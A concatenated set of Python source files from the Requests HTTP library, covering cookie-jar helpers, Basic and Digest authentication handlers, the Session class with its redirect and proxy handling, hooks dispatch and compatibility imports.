return create_cookie( comment=morsel["comment"], comment_url=bool(morsel["comment"]), discard=False, domain=morsel["domain"], expires=expires, name=morsel.key, path=morsel["path"], port=None, rest={"HttpOnly": morsel["httponly"]}, rfc2109=False, secure=bool(morsel["secure"]), value=morsel.value, version=morsel["version"] or 0, ) def cookiejar_from_dict(cookie_dict, cookiejar=None, overwrite=True): """Returns a CookieJar from a key/value dictionary. 
:param cookie_dict: Dict of key/values to insert into CookieJar. :param cookiejar: (optional) A cookiejar to add the cookies to. :param overwrite: (optional) If False, will not replace cookies already in the jar with new ones. :rtype: CookieJar """ if cookiejar is None: cookiejar = RequestsCookieJar() if cookie_dict is not None: names_from_jar = [cookie.name for cookie in cookiejar] for name in cookie_dict: if overwrite or (name not in names_from_jar): cookiejar.set_cookie(create_cookie(name, cookie_dict[name])) return cookiejar def merge_cookies(cookiejar, cookies): """Add cookies to cookiejar and returns a merged CookieJar. :param cookiejar: CookieJar object to add the cookies to. :param cookies: Dictionary or CookieJar object to be added. :rtype: CookieJar """ if not isinstance(cookiejar, cookielib.CookieJar): raise ValueError("You can only merge into CookieJar") if isinstance(cookies, dict): cookiejar = cookiejar_from_dict(cookies, cookiejar=cookiejar, overwrite=False) elif isinstance(cookies, cookielib.CookieJar): try: cookiejar.update(cookies) except AttributeError: for cookie_in_jar in cookies: cookiejar.set_cookie(cookie_in_jar) return cookiejar File: src/requests/auth.py """ requests.auth ~~~~~~~~~~~~~ This module contains the authentication handlers for Requests. """ import hashlib import os import re import threading import time import warnings from base64 import b64encode from ._internal_utils import to_native_string from .compat import basestring, str, urlparse from .cookies import extract_cookies_to_jar from .utils import parse_dict_header CONTENT_TYPE_FORM_URLENCODED = "application/x-www-form-urlencoded" CONTENT_TYPE_MULTI_PART = "multipart/form-data" def _basic_auth_str(username, password): """Returns a Basic Auth string.""" # "I want us to put a big-ol' comment on top of it that # says that this behaviour is dumb but we need to preserve # it because people are relying on it." # - Lukasa # # These are here solely to maintain backwards compatibility # for things like ints. This will be removed in 3.0.0. if not isinstance(username, basestring): warnings.warn( "Non-string usernames will no longer be supported in Requests " "3.0.0. Please convert the object you've passed in ({!r}) to " "a string or bytes object in the near future to avoid " "problems.".format(username), category=DeprecationWarning, ) username = str(username) if not isinstance(password, basestring): warnings.warn( "Non-string passwords will no longer be supported in Requests " "3.0.0. 
Please convert the object you've passed in ({!r}) to " "a string or bytes object in the near future to avoid " "problems.".format(type(password)), category=DeprecationWarning, ) password = str(password) # -- End Removal -- if isinstance(username, str): username = username.encode("latin1") if isinstance(password, str): password = password.encode("latin1") authstr = "Basic " + to_native_string( b64encode(b":".join((username, password))).strip() ) return authstr class AuthBase: """Base class that all auth implementations derive from""" def __call__(self, r): raise NotImplementedError("Auth hooks must be callable.") class HTTPBasicAuth(AuthBase): """Attaches HTTP Basic Authentication to the given Request object.""" def __init__(self, username, password): self.username = username self.password = password def __eq__(self, other): return all( [ self.username == getattr(other, "username", None), self.password == getattr(other, "password", None), ] ) def __ne__(self, other): return not self == other def __call__(self, r): r.headers["Authorization"] = _basic_auth_str(self.username, self.password) return r class HTTPProxyAuth(HTTPBasicAuth): """Attaches HTTP Proxy Authentication to a given Request object.""" def __call__(self, r): r.headers["Proxy-Authorization"] = _basic_auth_str(self.username, self.password) return r class HTTPDigestAuth(AuthBase): """Attaches HTTP Digest Authentication to the given Request object.""" def __init__(self, username, password): self.username = username self.password = password # Keep state in per-thread local storage self._thread_local = threading.local() def init_per_thread_state(self): # Ensure state is initialized just once per-thread if not hasattr(self._thread_local, "init"): self._thread_local.init = True self._thread_local.last_nonce = "" self._thread_local.nonce_count = 0 self._thread_local.chal = {} self._thread_local.pos = None self._thread_local.num_401_calls = None def build_digest_header(self, method, url): """ :rtype: str """ realm = self._thread_local.chal["realm"] nonce = self._thread_local.chal["nonce"] qop = self._thread_local.chal.get("qop") algorithm = self._thread_local.chal.get("algorithm") opaque = self._thread_local.chal.get("opaque") hash_utf8 = None if algorithm is None: _algorithm = "MD5" else: _algorithm = algorithm.upper() # lambdas assume digest modules are imported at the top level if _algorithm == "MD5" or _algorithm == "MD5-SESS": def md5_utf8(x): if isinstance(x, str): x = x.encode("utf-8") return hashlib.md5(x).hexdigest() hash_utf8 = md5_utf8 elif _algorithm == "SHA": def sha_utf8(x): if isinstance(x, str): x = x.encode("utf-8") return hashlib.sha1(x).hexdigest() hash_utf8 = sha_utf8 elif _algorithm == "SHA-256": def sha256_utf8(x): if isinstance(x, str): x = x.encode("utf-8") return hashlib.sha256(x).hexdigest() hash_utf8 = sha256_utf8 elif _algorithm == "SHA-512": def sha512_utf8(x): if isinstance(x, str): x = x.encode("utf-8") return hashlib.sha512(x).hexdigest() hash_utf8 = sha512_utf8 KD = lambda s, d: hash_utf8(f"{s}:{d}") # noqa:E731 if hash_utf8 is None: return None # XXX not implemented yet entdig = None p_parsed = urlparse(url) #: path is request-uri defined in RFC 2616 which should not be empty path = p_parsed.path or "/" if p_parsed.query: path += f"?{p_parsed.query}" A1 = f"{self.username}:{realm}:{self.password}" A2 = f"{method}:{path}" HA1 = hash_utf8(A1) HA2 = hash_utf8(A2) if nonce == self._thread_local.last_nonce: self._thread_local.nonce_count += 1 else: self._thread_local.nonce_count = 1 ncvalue = 
f"{self._thread_local.nonce_count:08x}" s = str(self._thread_local.nonce_count).encode("utf-8") s += nonce.encode("utf-8") s += time.ctime().encode("utf-8") s += os.urandom(8) cnonce = hashlib.sha1(s).hexdigest()[:16] if _algorithm == "MD5-SESS": HA1 = hash_utf8(f"{HA1}:{nonce}:{cnonce}") if not qop: respdig = KD(HA1, f"{nonce}:{HA2}") elif qop == "auth" or "auth" in qop.split(","): noncebit = f"{nonce}:{ncvalue}:{cnonce}:auth:{HA2}" respdig = KD(HA1, noncebit) else: # XXX handle auth-int. return None self._thread_local.last_nonce = nonce # XXX should the partial digests be encoded too? base = ( f'username="{self.username}", realm="{realm}", nonce="{nonce}", ' f'uri="{path}", response="{respdig}"' ) if opaque: base += f', opaque="{opaque}"' if algorithm: base += f', algorithm="{algorithm}"' if entdig: base += f', digest="{entdig}"' if qop: base += f', qop="auth", nc={ncvalue}, cnonce="{cnonce}"' return f"Digest {base}" def handle_redirect(self, r, **kwargs): """Reset num_401_calls counter on redirects.""" if r.is_redirect: self._thread_local.num_401_calls = 1 def handle_401(self, r, **kwargs): """ Takes the given response and tries digest-auth, if needed. :rtype: requests.Response """ # If response is not 4xx, do not auth # See https://github.com/psf/requests/issues/3772 if not 400 <= r.status_code < 500: self._thread_local.num_401_calls = 1 return r if self._thread_local.pos is not None: # Rewind the file position indicator of the body to where # it was to resend the request. r.request.body.seek(self._thread_local.pos) s_auth = r.headers.get("www-authenticate", "") if "digest" in s_auth.lower() and self._thread_local.num_401_calls < 2: self._thread_local.num_401_calls += 1 pat = re.compile(r"digest ", flags=re.IGNORECASE) self._thread_local.chal = parse_dict_header(pat.sub("", s_auth, count=1)) # Consume content and release the original connection # to allow our new request to reuse the same one. r.content r.close() prep = r.request.copy() extract_cookies_to_jar(prep._cookies, r.request, r.raw) prep.prepare_cookies(prep._cookies) prep.headers["Authorization"] = self.build_digest_header( prep.method, prep.url ) _r = r.connection.send(prep, **kwargs) _r.history.append(r) _r.request = prep return _r self._thread_local.num_401_calls = 1 return r def __call__(self, r): # Initialize per-thread state, if needed self.init_per_thread_state() # If we have a saved nonce, skip the 401 if self._thread_local.last_nonce: r.headers["Authorization"] = self.build_digest_header(r.method, r.url) try: self._thread_local.pos = r.body.tell() except AttributeError: # In the case of HTTPDigestAuth being reused and the body of # the previous request was a file-like object, pos has the # file position of the previous body. Ensure it's set to # None. self._thread_local.pos = None r.register_hook("response", self.handle_401) r.register_hook("response", self.handle_redirect) self._thread_local.num_401_calls = 1 return r def __eq__(self, other): return all( [ self.username == getattr(other, "username", None), self.password == getattr(other, "password", None), ] ) def __ne__(self, other): return not self == other File: src/requests/sessions.py """ requests.sessions ~~~~~~~~~~~~~~~~~ This module provides a Session object to manage and persist settings across requests (cookies, auth, proxies). 
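
A small illustrative sketch of the "persist settings" part (the header name and
credentials below are placeholders)::

    >>> import requests
    >>> s = requests.Session()
    >>> s.auth = ("user", "pass")             # reused by every request
    >>> s.headers.update({"x-example": "1"})  # merged into each request's headers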
""" import os import sys import time from collections import OrderedDict from datetime import timedelta from ._internal_utils import to_native_string from .adapters import HTTPAdapter from .auth import _basic_auth_str from .compat import Mapping, cookielib, urljoin, urlparse from .cookies import ( RequestsCookieJar, cookiejar_from_dict, extract_cookies_to_jar, merge_cookies, ) from .exceptions import ( ChunkedEncodingError, ContentDecodingError, InvalidSchema, TooManyRedirects, ) from .hooks import default_hooks, dispatch_hook # formerly defined here, reexposed here for backward compatibility from .models import ( # noqa: F401 DEFAULT_REDIRECT_LIMIT, REDIRECT_STATI, PreparedRequest, Request, ) from .status_codes import codes from .structures import CaseInsensitiveDict from .utils import ( # noqa: F401 DEFAULT_PORTS, default_headers, get_auth_from_url, get_environ_proxies, get_netrc_auth, requote_uri, resolve_proxies, rewind_body, should_bypass_proxies, to_key_val_list, ) # Preferred clock, based on which one is more accurate on a given system. if sys.platform == "win32": preferred_clock = time.perf_counter else: preferred_clock = time.time def merge_setting(request_setting, session_setting, dict_class=OrderedDict): """Determines appropriate setting for a given request, taking into account the explicit setting on that request, and the setting in the session. If a setting is a dictionary, they will be merged together using `dict_class` """ if session_setting is None: return request_setting if request_setting is None: return session_setting # Bypass if not a dictionary (e.g. verify) if not ( isinstance(session_setting, Mapping) and isinstance(request_setting, Mapping) ): return request_setting merged_setting = dict_class(to_key_val_list(session_setting)) merged_setting.update(to_key_val_list(request_setting)) # Remove keys that are set to None. Extract keys first to avoid altering # the dictionary during iteration. none_keys = [k for (k, v) in merged_setting.items() if v is None] for key in none_keys: del merged_setting[key] return merged_setting def merge_hooks(request_hooks, session_hooks, dict_class=OrderedDict): """Properly merges both requests and session hooks. This is necessary because when request_hooks == {'response': []}, the merge breaks Session hooks entirely. """ if session_hooks is None or session_hooks.get("response") == []: return request_hooks if request_hooks is None or request_hooks.get("response") == []: return session_hooks return merge_setting(request_hooks, session_hooks, dict_class) class SessionRedirectMixin: def get_redirect_target(self, resp): """Receives a Response. Returns a redirect URI or ``None``""" # Due to the nature of how requests processes redirects this method will # be called at least once upon the original response and at least twice # on each subsequent redirect response (if any). # If a custom mixin is used to handle this logic, it may be advantageous # to cache the redirect location onto the response object as a private # attribute. if resp.is_redirect: location = resp.headers["location"] # Currently the underlying http module on py3 decode headers # in latin1, but empirical evidence suggests that latin1 is very # rarely used with non-ASCII characters in HTTP headers. # It is more likely to get UTF8 header rather than latin1. # This causes incorrect handling of UTF8 encoded location headers. # To solve this, we re-encode the location in latin1. 
location = location.encode("latin1") return to_native_string(location, "utf8") return None def should_strip_auth(self, old_url, new_url): """Decide whether Authorization header should be removed when redirecting""" old_parsed = urlparse(old_url) new_parsed = urlparse(new_url) if old_parsed.hostname != new_parsed.hostname: return True # Special case: allow http -> https redirect when using the standard # ports. This isn't specified by RFC 7235, but is kept to avoid # breaking backwards compatibility with older versions of requests # that allowed any redirects on the same host. if ( old_parsed.scheme == "http" and old_parsed.port in (80, None) and new_parsed.scheme == "https" and new_parsed.port in (443, None) ): return False # Handle default port usage corresponding to scheme. changed_port = old_parsed.port != new_parsed.port changed_scheme = old_parsed.scheme != new_parsed.scheme default_port = (DEFAULT_PORTS.get(old_parsed.scheme, None), None) if ( not changed_scheme and old_parsed.port in default_port and new_parsed.port in default_port ): return False # Standard case: root URI must match return changed_port or changed_scheme def resolve_redirects( self, resp, req, stream=False, timeout=None, verify=True, cert=None, proxies=None, yield_requests=False, **adapter_kwargs, ): """Receives a Response. Returns a generator of Responses or Requests.""" hist = [] # keep track of history url = self.get_redirect_target(resp) previous_fragment = urlparse(req.url).fragment while url: prepared_request = req.copy() # Update history and keep track of redirects. # resp.history must ignore the original request in this loop hist.append(resp) resp.history = hist[1:] try: resp.content # Consume socket so it can be released except (ChunkedEncodingError, ContentDecodingError, RuntimeError): resp.raw.read(decode_content=False) if len(resp.history) >= self.max_redirects: raise TooManyRedirects( f"Exceeded {self.max_redirects} redirects.", response=resp ) # Release the connection back into the pool. resp.close() # Handle redirection without scheme (see: RFC 1808 Section 4) if url.startswith("//"): parsed_rurl = urlparse(resp.url) url = ":".join([to_native_string(parsed_rurl.scheme), url]) # Normalize url case and attach previous fragment if needed (RFC 7231 7.1.2) parsed = urlparse(url) if parsed.fragment == "" and previous_fragment: parsed = parsed._replace(fragment=previous_fragment) elif parsed.fragment: previous_fragment = parsed.fragment url = parsed.geturl() # Facilitate relative 'location' headers, as allowed by RFC 7231. # (e.g. '/path/to/resource' instead of 'http://domain.tld/path/to/resource') # Compliant with RFC3986, we percent encode the url. if not parsed.netloc: url = urljoin(resp.url, requote_uri(url)) else: url = requote_uri(url) prepared_request.url = to_native_string(url) self.rebuild_method(prepared_request, resp) # https://github.com/psf/requests/issues/1084 if resp.status_code not in ( codes.temporary_redirect, codes.permanent_redirect, ): # https://github.com/psf/requests/issues/3490 purged_headers = ("Content-Length", "Content-Type", "Transfer-Encoding") for header in purged_headers: prepared_request.headers.pop(header, None) prepared_request.body = None headers = prepared_request.headers headers.pop("Cookie", None) # Extract any cookies sent on the response to the cookiejar # in the new request. Because we've mutated our copied prepared # request, use the old one that we haven't yet touched. 
extract_cookies_to_jar(prepared_request._cookies, req, resp.raw) merge_cookies(prepared_request._cookies, self.cookies) prepared_request.prepare_cookies(prepared_request._cookies) # Rebuild auth and proxy information. proxies = self.rebuild_proxies(prepared_request, proxies) self.rebuild_auth(prepared_request, resp) # A failed tell() sets `_body_position` to `object()`. This non-None # value ensures `rewindable` will be True, allowing us to raise an # UnrewindableBodyError, instead of hanging the connection. rewindable = prepared_request._body_position is not None and ( "Content-Length" in headers or "Transfer-Encoding" in headers ) # Attempt to rewind consumed file-like object. if rewindable: rewind_body(prepared_request) # Override the original request. req = prepared_request if yield_requests: yield req else: resp = self.send( req, stream=stream, timeout=timeout, verify=verify, cert=cert, proxies=proxies, allow_redirects=False, **adapter_kwargs, ) extract_cookies_to_jar(self.cookies, prepared_request, resp.raw) # extract redirect url, if any, for the next loop url = self.get_redirect_target(resp) yield resp def rebuild_auth(self, prepared_request, response): """When being redirected we may want to strip authentication from the request to avoid leaking credentials. This method intelligently removes and reapplies authentication where possible to avoid credential loss. """ headers = prepared_request.headers url = prepared_request.url if "Authorization" in headers and self.should_strip_auth( response.request.url, url ): # If we get redirected to a new host, we should strip out any # authentication headers. del headers["Authorization"] # .netrc might have more auth for us on our new host. new_auth = get_netrc_auth(url) if self.trust_env else None if new_auth is not None: prepared_request.prepare_auth(new_auth) def rebuild_proxies(self, prepared_request, proxies): """This method re-evaluates the proxy configuration by considering the environment variables. If we are redirected to a URL covered by NO_PROXY, we strip the proxy configuration. Otherwise, we set missing proxy keys for this URL (in case they were stripped by a previous redirect). This method also replaces the Proxy-Authorization header where necessary. :rtype: dict """ headers = prepared_request.headers scheme = urlparse(prepared_request.url).scheme new_proxies = resolve_proxies(prepared_request, proxies, self.trust_env) if "Proxy-Authorization" in headers: del headers["Proxy-Authorization"] try: username, password = get_auth_from_url(new_proxies[scheme]) except KeyError: username, password = None, None # urllib3 handles proxy authorization for us in the standard adapter. # Avoid appending this to TLS tunneled requests where it may be leaked. if not scheme.startswith("https") and username and password: headers["Proxy-Authorization"] = _basic_auth_str(username, password) return new_proxies def rebuild_method(self, prepared_request, response): """When being redirected we may want to change the method of the request based on certain specs or browser behavior. """ method = prepared_request.method # https://tools.ietf.org/html/rfc7231#section-6.4.4 if response.status_code == codes.see_other and method != "HEAD": method = "GET" # Do what the browsers do, despite standards... # First, turn 302s into GETs. if response.status_code == codes.found and method != "HEAD": method = "GET" # Second, if a POST is responded to with a 301, turn it into a GET. # This bizarre behaviour is explained in Issue 1704. 
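        # (i.e. a POST answered with 301 Moved Permanently is retried as a GET,
        # mirroring mainstream browser behaviour.)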
if response.status_code == codes.moved and method == "POST": method = "GET" prepared_request.method = method class Session(SessionRedirectMixin): """A Requests session. Provides cookie persistence, connection-pooling, and configuration. Basic Usage:: >>> import requests >>> s = requests.Session() >>> s.get('https://httpbin.org/get') <Response [200]> Or as a context manager:: >>> with requests.Session() as s: ... s.get('https://httpbin.org/get') <Response [200]> """ __attrs__ = [ "headers", "cookies", "auth", "proxies", "hooks", "params", "verify", "cert", "adapters", "stream", "trust_env", "max_redirects", ] def __init__(self): #: A case-insensitive dictionary of headers to be sent on each #: :class:`Request <Request>` sent from this #: :class:`Session <Session>`. self.headers = default_headers() #: Default Authentication tuple or object to attach to #: :class:`Request <Request>`. self.auth = None #: Dictionary mapping protocol or protocol and host to the URL of the proxy #: (e.g. {'http': 'foo.bar:3128', 'http://host.name': 'foo.bar:4012'}) to #: be used on each :class:`Request <Request>`. self.proxies = {} #: Event-handling hooks. self.hooks = default_hooks() #: Dictionary of querystring data to attach to each #: :class:`Request <Request>`. The dictionary values may be lists for #: representing multivalued query parameters. self.params = {} #: Stream response content default. self.stream = False #: SSL Verification default. #: Defaults to `True`, requiring requests to verify the TLS certificate at the #: remote end. #: If verify is set to `False`, requests will accept any TLS certificate #: presented by the server, and will ignore hostname mismatches and/or #: expired certificates, which will make your application vulnerable to #: man-in-the-middle (MitM) attacks. #: Only set this to `False` for testing. self.verify = True #: SSL client certificate default, if String, path to ssl client #: cert file (.pem). If Tuple, ('cert', 'key') pair. self.cert = None #: Maximum number of redirects allowed. If the request exceeds this #: limit, a :class:`TooManyRedirects` exception is raised. #: This defaults to requests.models.DEFAULT_REDIRECT_LIMIT, which is #: 30. self.max_redirects = DEFAULT_REDIRECT_LIMIT #: Trust environment settings for proxy configuration, default #: authentication and similar. self.trust_env = True #: A CookieJar containing all currently outstanding cookies set on this #: session. By default it is a #: :class:`RequestsCookieJar <requests.cookies.RequestsCookieJar>`, but #: may be any other ``cookielib.CookieJar`` compatible object. self.cookies = cookiejar_from_dict({}) # Default connection adapters. self.adapters = OrderedDict() self.mount("https://", HTTPAdapter()) self.mount("http://", HTTPAdapter()) def __enter__(self): return self def __exit__(self, *args): self.close() def prepare_request(self, request): """Constructs a :class:`PreparedRequest <PreparedRequest>` for transmission and returns it. The :class:`PreparedRequest` has settings merged from the :class:`Request <Request>` instance and those of the :class:`Session`. :param request: :class:`Request` instance to prepare with this session's settings. :rtype: requests.PreparedRequest """ cookies = request.cookies or {} # Bootstrap CookieJar. if not isinstance(cookies, cookielib.CookieJar): cookies = cookiejar_from_dict(cookies) # Merge with session cookies merged_cookies = merge_cookies( merge_cookies(RequestsCookieJar(), self.cookies), cookies ) # Set environment's basic authentication if not explicitly set. 
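        # (With trust_env enabled and no auth on either the request or the
        # session, credentials are looked up in the user's netrc file.)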
auth = request.auth if self.trust_env and not auth and not self.auth: auth = get_netrc_auth(request.url) p = PreparedRequest() p.prepare( method=request.method.upper(), url=request.url, files=request.files, data=request.data, json=request.json, headers=merge_setting( request.headers, self.headers, dict_class=CaseInsensitiveDict ), params=merge_setting(request.params, self.params), auth=merge_setting(auth, self.auth), cookies=merged_cookies, hooks=merge_hooks(request.hooks, self.hooks), ) return p def request( self, method, url, params=None, data=None, headers=None, cookies=None, files=None, auth=None, timeout=None, allow_redirects=True, proxies=None, hooks=None, stream=None, verify=None, cert=None, json=None, ): """Constructs a :class:`Request <Request>`, prepares it and sends it. Returns :class:`Response <Response>` object. :param method: method for the new :class:`Request` object. :param url: URL for the new :class:`Request` object. :param params: (optional) Dictionary or bytes to be sent in the query string for the :class:`Request`. :param data: (optional) Dictionary, list of tuples, bytes, or file-like object to send in the body of the :class:`Request`. :param json: (optional) json to send in the body of the :class:`Request`. :param headers: (optional) Dictionary of HTTP Headers to send with the :class:`Request`. :param cookies: (optional) Dict or CookieJar object to send with the :class:`Request`. :param files: (optional) Dictionary of ``'filename': file-like-objects`` for multipart encoding upload. :param auth: (optional) Auth tuple or callable to enable Basic/Digest/Custom HTTP Auth. :param timeout: (optional) How long to wait for the server to send data before giving up, as a float, or a :ref:`(connect timeout, read timeout) <timeouts>` tuple. :type timeout: float or tuple :param allow_redirects: (optional) Set to True by default. :type allow_redirects: bool :param proxies: (optional) Dictionary mapping protocol or protocol and hostname to the URL of the proxy. :param hooks: (optional) Dictionary mapping hook name to one event or list of events, event must be callable. :param stream: (optional) whether to immediately download the response content. Defaults to ``False``. :param verify: (optional) Either a boolean, in which case it controls whether we verify the server's TLS certificate, or a string, in which case it must be a path to a CA bundle to use. Defaults to ``True``. When set to ``False``, requests will accept any TLS certificate presented by the server, and will ignore hostname mismatches and/or expired certificates, which will make your application vulnerable to man-in-the-middle (MitM) attacks. Setting verify to ``False`` may be useful during local development or testing. :param cert: (optional) if String, path to ssl client cert file (.pem). If Tuple, ('cert', 'key') pair. :rtype: requests.Response """ # Create the Request. req = Request( method=method.upper(), url=url, headers=headers, files=files, data=data or {}, json=json, params=params or {}, auth=auth, cookies=cookies, hooks=hooks, ) prep = self.prepare_request(req) proxies = proxies or {} settings = self.merge_environment_settings( prep.url, proxies, stream, verify, cert ) # Send the request. send_kwargs = { "timeout": timeout, "allow_redirects": allow_redirects, } send_kwargs.update(settings) resp = self.send(prep, **send_kwargs) return resp def get(self, url, **kwargs): r"""Sends a GET request. Returns :class:`Response` object. :param url: URL for the new :class:`Request` object. 
:param \*\*kwargs: Optional arguments that ``request`` takes. :rtype: requests.Response """ kwargs.setdefault("allow_redirects", True) return self.request("GET", url, **kwargs) def options(self, url, **kwargs): r"""Sends a OPTIONS request. Returns :class:`Response` object. :param url: URL for the new :class:`Request` object. :param \*\*kwargs: Optional arguments that ``request`` takes. :rtype: requests.Response """ kwargs.setdefault("allow_redirects", True) return self.request("OPTIONS", url, **kwargs) def head(self, url, **kwargs): r"""Sends a HEAD request. Returns :class:`Response` object. :param url: URL for the new :class:`Request` object. :param \*\*kwargs: Optional arguments that ``request`` takes. :rtype: requests.Response """ kwargs.setdefault("allow_redirects", False) return self.request("HEAD", url, **kwargs) def post(self, url, data=None, json=None, **kwargs): r"""Sends a POST request. Returns :class:`Response` object. :param url: URL for the new :class:`Request` object. :param data: (optional) Dictionary, list of tuples, bytes, or file-like object to send in the body of the :class:`Request`. :param json: (optional) json to send in the body of the :class:`Request`. :param \*\*kwargs: Optional arguments that ``request`` takes. :rtype: requests.Response """ return self.request("POST", url, data=data, json=json, **kwargs) def put(self, url, data=None, **kwargs): r"""Sends a PUT request. Returns :class:`Response` object. :param url: URL for the new :class:`Request` object. :param data: (optional) Dictionary, list of tuples, bytes, or file-like object to send in the body of the :class:`Request`. :param \*\*kwargs: Optional arguments that ``request`` takes. :rtype: requests.Response """ return self.request("PUT", url, data=data, **kwargs) def patch(self, url, data=None, **kwargs): r"""Sends a PATCH request. Returns :class:`Response` object. :param url: URL for the new :class:`Request` object. :param data: (optional) Dictionary, list of tuples, bytes, or file-like object to send in the body of the :class:`Request`. :param \*\*kwargs: Optional arguments that ``request`` takes. :rtype: requests.Response """ return self.request("PATCH", url, data=data, **kwargs) def delete(self, url, **kwargs): r"""Sends a DELETE request. Returns :class:`Response` object. :param url: URL for the new :class:`Request` object. :param \*\*kwargs: Optional arguments that ``request`` takes. :rtype: requests.Response """ return self.request("DELETE", url, **kwargs) def send(self, request, **kwargs): """Send a given PreparedRequest. :rtype: requests.Response """ # Set defaults that the hooks can utilize to ensure they always have # the correct parameters to reproduce the previous request. kwargs.setdefault("stream", self.stream) kwargs.setdefault("verify", self.verify) kwargs.setdefault("cert", self.cert) if "proxies" not in kwargs: kwargs["proxies"] = resolve_proxies(request, self.proxies, self.trust_env) # It's possible that users might accidentally send a Request object. # Guard against that specific failure case. 
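        # (A bare Request must go through Session.prepare_request() first;
        # send() only accepts PreparedRequest instances.)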
if isinstance(request, Request): raise ValueError("You can only send PreparedRequests.") # Set up variables needed for resolve_redirects and dispatching of hooks allow_redirects = kwargs.pop("allow_redirects", True) stream = kwargs.get("stream") hooks = request.hooks # Get the appropriate adapter to use adapter = self.get_adapter(url=request.url) # Start time (approximately) of the request start = preferred_clock() # Send the request r = adapter.send(request, **kwargs) # Total elapsed time of the request (approximately) elapsed = preferred_clock() - start r.elapsed = timedelta(seconds=elapsed) # Response manipulation hooks r = dispatch_hook("response", hooks, r, **kwargs) # Persist cookies if r.history: # If the hooks create history then we want those cookies too for resp in r.history: extract_cookies_to_jar(self.cookies, resp.request, resp.raw) extract_cookies_to_jar(self.cookies, request, r.raw) # Resolve redirects if allowed. if allow_redirects: # Redirect resolving generator. gen = self.resolve_redirects(r, request, **kwargs) history = [resp for resp in gen] else: history = [] # Shuffle things around if there's history. if history: # Insert the first (original) request at the start history.insert(0, r) # Get the last request made r = history.pop() r.history = history # If redirects aren't being followed, store the response on the Request for Response.next(). if not allow_redirects: try: r._next = next( self.resolve_redirects(r, request, yield_requests=True, **kwargs) ) except StopIteration: pass if not stream: r.content return r def merge_environment_settings(self, url, proxies, stream, verify, cert): """ Check the environment and merge it with some settings. :rtype: dict """ # Gather clues from the surrounding environment. if self.trust_env: # Set environment's proxies. no_proxy = proxies.get("no_proxy") if proxies is not None else None env_proxies = get_environ_proxies(url, no_proxy=no_proxy) for k, v in env_proxies.items(): proxies.setdefault(k, v) # Look for requests environment configuration # and be compatible with cURL. if verify is True or verify is None: verify = ( os.environ.get("REQUESTS_CA_BUNDLE") or os.environ.get("CURL_CA_BUNDLE") or verify ) # Merge all the kwargs. proxies = merge_setting(proxies, self.proxies) stream = merge_setting(stream, self.stream) verify = merge_setting(verify, self.verify) cert = merge_setting(cert, self.cert) return {"proxies": proxies, "stream": stream, "verify": verify, "cert": cert} def get_adapter(self, url): """ Returns the appropriate connection adapter for the given URL. :rtype: requests.adapters.BaseAdapter """ for prefix, adapter in self.adapters.items(): if url.lower().startswith(prefix.lower()): return adapter # Nothing matches :-/ raise InvalidSchema(f"No connection adapters were found for {url!r}") def close(self): """Closes all adapters and as such the session""" for v in self.adapters.values(): v.close() def mount(self, prefix, adapter): """Registers a connection adapter to a prefix. Adapters are sorted in descending order by prefix length. """ self.adapters[prefix] = adapter keys_to_move = [k for k in self.adapters if len(k) < len(prefix)] for key in keys_to_move: self.adapters[key] = self.adapters.pop(key) def __getstate__(self): state = {attr: getattr(self, attr, None) for attr in self.__attrs__} return state def __setstate__(self, state): for attr, value in state.items(): setattr(self, attr, value) def session(): """ Returns a :class:`Session` for context-management. .. 
deprecated:: 1.0.0 This method has been deprecated since version 1.0.0 and is only kept for backwards compatibility. New code should use :class:`~requests.sessions.Session` to create a session. This may be removed at a future date. :rtype: Session """ return Session() File: src/requests/hooks.py """ requests.hooks ~~~~~~~~~~~~~~ This module provides the capabilities for the Requests hooks system. Available hooks: ``response``: The response generated from a Request. """ HOOKS = ["response"] def default_hooks(): return {event: [] for event in HOOKS} # TODO: response is the only one def dispatch_hook(key, hooks, hook_data, **kwargs): """Dispatches a hook dictionary on a given piece of data.""" hooks = hooks or {} hooks = hooks.get(key) if hooks: if hasattr(hooks, "__call__"): hooks = [hooks] for hook in hooks: _hook_data = hook(hook_data, **kwargs) if _hook_data is not None: hook_data = _hook_data return hook_data File: src/requests/compat.py """ requests.compat ~~~~~~~~~~~~~~~ This module previously handled import compatibility issues between Python 2 and Python 3. It remains for backwards compatibility until the next major version. """ import importlib import sys # ------- # urllib3 # ------- from urllib3 import __version__ as urllib3_version # Detect which major version of urllib3 is being used. try: is_urllib3_1 = int(urllib3_version.split(".")[0]) == 1 except (TypeError, AttributeError): # If we can't discern a version, prefer old functionality. is_urllib3_1 = True # ------------------- # Character Detection # ------------------- def _resolve_char_detection(): """Find supported character detection libraries.""" chardet = None for lib in ("chardet", "charset_normalizer"): if chardet is None: try: chardet = importlib.import_module(lib) except ImportError: pass return chardet chardet = _resolve_char_detection() # ------- # Pythons # ------- # Syntax sugar. _ver = sys.version_info #: Python 2.x? is_py2 = _ver[0] == 2 #: Python 3.x? is_py3 = _ver[0] == 3 # json/simplejson module import resolution has_simplejson = False try: import simplejson as json has_simplejson = True except ImportError: import json if has_simplejson: from simplejson import JSONDecodeError else: from json import JSONDecodeError # Keep OrderedDict for backwards compatibility. from collections import OrderedDict from collections.abc import Callable, Mapping, MutableMapping from http import cookiejar as cookielib from http.cookies import Morsel from io import StringIO # -------------- # Legacy Imports # -------------- from urllib.parse import ( quote, quote_plus, unquote, unquote_plus, urldefrag, urlencode, urljoin, urlparse, urlsplit, urlunparse, ) from urllib.request import ( getproxies, getproxies_environment, parse_http_list, proxy_bypass, proxy_bypass_environment, ) builtin_str = str str = str bytes = bytes basestring = (str, bytes) numeric_types = (int, float) integer_types = (int,) File: src/requests/models.py """ requests.models ~~~~~~~~~~~~~~~ This module contains the primary objects that power Requests. """ import datetime # Import encoding now, to avoid implicit import later. # Implicit import within threads may cause LookupError when standard library is in a ZIP, # such as in Embedded Python. See https://github.com/psf/requests/issues/3578. 
